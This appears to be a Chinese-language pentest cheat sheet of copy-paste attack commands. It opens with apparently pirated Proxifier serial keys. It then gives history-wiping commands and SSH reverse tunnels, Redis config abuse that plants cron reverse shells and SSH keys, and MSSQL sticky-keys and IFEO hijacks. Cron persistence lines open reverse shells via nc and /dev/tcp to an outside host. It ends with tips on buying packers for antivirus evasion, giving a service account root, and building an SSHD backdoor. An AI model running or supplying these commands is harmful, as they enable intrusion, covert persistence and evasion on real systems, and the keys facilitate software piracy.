pentest
一顿复制粘贴,毫无技术含量
工具集
proxifier
下载地址 http://www.proxifier.com/download/
序列号
L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C(Portable Edition)
5EZ8G-C3WL5-B56YG-SCXM9-6QZAP(Standard Edition)
P427L-9Y552-5433E-8DSR3-58Z68(MAC)
proxychains-ng
# 用Mac的优势!!!
brew install proxychains-ng
高频命令
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
python -c 'import pty; pty.spawn("/bin/sh")'
ssh -C -f -N -g -R 3389:10.0.0.1:3389 [email protected]
plink.exe -C -N -R 3389:127.0.0.1:3389 [email protected] -pw 123456 -P 443
set 0 "\n\n\n* * * * * bash -i >& /dev/tcp/118.118.118.118/53 0>&1\n\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
config set dir /var/lib/redis
config set dbfilename dump.rdb
cat foo.txt | redis-cli -h 10.10.10.10 -x set 0
config set dir /root/.ssh
config set dbfilename "authorized_keys"
简单操作
# MSSQL 替换系统文件
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';
# IFEO劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='c:\windows\system32\cmd.exe'
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
操作ES查询数据
查看索引
http://10.10.10.10:9200/_cat/indices
搜索数据
http://10.10.10.10:9200/hello/_search?pretty&size=50&from=50
短期内持久化
(crontab -l;echo '*/60 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc -w 3 118.118.118.118 53 >/tmp/yum.log')|crontab -
(crontab -l;echo '*/5 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc 118.118.118.118 53 >/tmp/yum.log')|crontab -
(crontab -l;echo '*/1 * * * * exec 9<> /dev/tcp/118.118.118.118/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
买个最新的壳快速免杀
支持微信支付,萌萌哒
https://vmpsoft.com/purchase/buy-online/
已有用户加个密码复用
# 替换用户shell
usermod -s /bin/bash ntp
usermod -g root ntp # 给予root权限
passwd ntp # 加个密码,改个/etc/passwd id = 0
编译SSHD后门
./configure --sysconfdir=/etc/ssh --bindir=/usr/bin --sbindir=/usr/sbin --prefix=/usr --with-pam --with-tcp-wrappers --with-kerberos5 --without-zlib-version-check --without-openssl-header-check